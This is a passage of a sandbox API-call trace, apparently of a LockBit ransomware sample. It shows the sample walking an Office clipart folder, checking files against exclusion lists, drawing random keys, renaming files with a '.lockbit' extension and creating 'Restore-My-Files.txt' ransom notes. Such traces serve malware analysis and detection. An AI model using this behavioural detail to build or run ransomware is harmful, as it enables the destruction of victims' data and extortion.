[0112.158] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0112.158] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0112.158] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0112.158] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.158] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0112.158] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0112.158] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0112.159] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0112.159] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01140_.WMF") returned 1 [0112.159] lstrcmpiW (lpString1="ntldr", lpString2="DD01140_.WMF") returned 1 [0112.159] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01140_.WMF") returned 1 [0112.159] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01140_.WMF") returned -1 [0112.159] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01140_.WMF") returned -1 [0112.159] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01140_.WMF") returned 1 [0112.159] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01140_.WMF") returned 1 [0112.159] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0112.159] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned=".WMF" [0112.159] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0112.159] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0112.159] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0112.159] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0112.159] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0112.159] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0112.159] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0112.159] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0112.159] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0112.159] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0112.159] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0112.159] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0112.159] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0112.159] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0112.159] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0112.159] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0112.159] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0112.159] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0112.159] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0112.159] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0112.160] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0112.160] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0112.160] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0112.160] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0112.160] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0112.160] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0112.160] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0112.160] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0112.160] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF.lockbit") returned 72 [0112.160] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01140_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x344 [0112.164] CreateIoCompletionPort (FileHandle=0x344, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0112.164] malloc (_Size=0x40068) returned 0x3e70008 [0112.164] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=3616) returned 1 [0112.164] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.164] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.164] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0112.164] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.165] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.165] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0112.165] ReadFile (in: hFile=0x344, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0112.167] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0112.167] malloc (_Size=0xa6) returned 0x77d7a8 [0112.167] NtSetInformationFile (FileHandle=0x344, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0112.168] free (_Block=0x77d7a8) [0112.168] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0112.168] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0112.168] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0112.168] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x85c, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01143_.WMF", cAlternateFileName="")) returned 1 [0112.168] lstrcmpiW (lpString1=".", lpString2="DD01143_.WMF") returned -1 [0112.168] lstrcmpiW (lpString1="..", lpString2="DD01143_.WMF") returned -1 [0112.168] PathFindExtensionW (pszPath="DD01143_.WMF") returned=".WMF" [0112.168] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0112.168] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0112.168] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0112.168] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0112.168] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0112.168] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0112.168] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0112.168] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0112.168] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0112.168] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0112.168] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0112.168] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0112.168] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0112.168] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0112.169] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0112.169] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0112.169] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0112.169] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0112.169] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0112.169] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0112.169] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0112.169] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0112.169] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0112.169] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0112.169] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.169] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0112.169] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0112.169] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0112.169] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0112.169] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0112.169] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0112.169] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0112.169] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0112.169] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0112.169] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0112.169] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0112.169] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0112.169] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0112.169] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0112.169] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0112.169] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0112.169] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0112.169] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.170] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0112.170] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0112.170] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0112.170] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0112.170] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01143_.WMF") returned 1 [0112.170] lstrcmpiW (lpString1="ntldr", lpString2="DD01143_.WMF") returned 1 [0112.170] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01143_.WMF") returned 1 [0112.170] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01143_.WMF") returned -1 [0112.170] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01143_.WMF") returned -1 [0112.170] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01143_.WMF") returned 1 [0112.170] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01143_.WMF") returned 1 [0112.170] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0112.170] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned=".WMF" [0112.170] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0112.170] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0112.170] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0112.170] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0112.170] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0112.170] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0112.170] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0112.170] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0112.170] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0112.171] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0112.171] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0112.171] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0112.171] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0112.171] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0112.171] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0112.171] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0112.171] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0112.171] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0112.171] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0112.171] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0112.171] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0112.171] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0112.171] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0112.171] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0112.171] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0112.171] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0112.171] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0112.171] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0112.171] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF.lockbit") returned 72 [0112.171] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01143_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0112.172] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0112.172] malloc (_Size=0x40068) returned 0x3ef0008 [0112.172] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=2140) returned 1 [0112.172] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.173] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.173] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0112.173] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.173] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.173] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0112.173] ReadFile (in: hFile=0x3bc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0112.178] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0112.178] malloc (_Size=0xa6) returned 0x77d7a8 [0112.178] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0112.179] free (_Block=0x77d7a8) [0112.179] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0112.179] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0112.179] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0112.179] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xadc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01145_.WMF", cAlternateFileName="")) returned 1 [0112.180] lstrcmpiW (lpString1=".", lpString2="DD01145_.WMF") returned -1 [0112.180] lstrcmpiW (lpString1="..", lpString2="DD01145_.WMF") returned -1 [0112.180] PathFindExtensionW (pszPath="DD01145_.WMF") returned=".WMF" [0112.180] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0112.180] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0112.180] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0112.180] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0112.180] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0112.180] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0112.180] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0112.180] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0112.180] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0112.180] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0112.180] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0112.180] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0112.180] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0112.180] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0112.180] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0112.180] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0112.180] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0112.180] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0112.181] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0112.181] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0112.181] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0112.181] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0112.181] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0112.181] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0112.181] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.181] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0112.181] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0112.181] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0112.181] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0112.181] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0112.181] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0112.181] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0112.181] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0112.181] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0112.181] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0112.181] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0112.181] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0112.181] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0112.181] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0112.181] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0112.181] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0112.181] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0112.181] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.182] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0112.182] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0112.182] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0112.182] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0112.182] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01145_.WMF") returned 1 [0112.182] lstrcmpiW (lpString1="ntldr", lpString2="DD01145_.WMF") returned 1 [0112.182] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01145_.WMF") returned 1 [0112.182] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01145_.WMF") returned -1 [0112.182] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01145_.WMF") returned -1 [0112.182] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01145_.WMF") returned 1 [0112.182] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01145_.WMF") returned 1 [0112.182] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0112.182] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned=".WMF" [0112.182] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0112.182] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0112.182] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0112.182] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0112.182] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0112.182] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0112.182] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0112.182] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0112.182] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0112.182] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0112.182] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0112.182] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0112.183] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0112.183] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0112.183] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0112.183] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0112.183] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0112.183] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0112.183] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0112.183] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0112.183] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0112.183] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0112.183] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0112.183] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0112.183] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0112.183] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0112.183] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0112.183] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0112.183] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF.lockbit") returned 72 [0112.183] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01145_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0112.184] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0112.184] malloc (_Size=0x40068) returned 0x1ff1e60 [0112.184] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2780) returned 1 [0112.184] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.184] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.184] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0112.184] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.185] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.185] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0112.185] ReadFile (in: hFile=0x340, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0112.192] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0112.192] malloc (_Size=0xa6) returned 0x77d7a8 [0112.193] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0112.193] free (_Block=0x77d7a8) [0112.193] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0112.193] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0112.193] CreateFileW 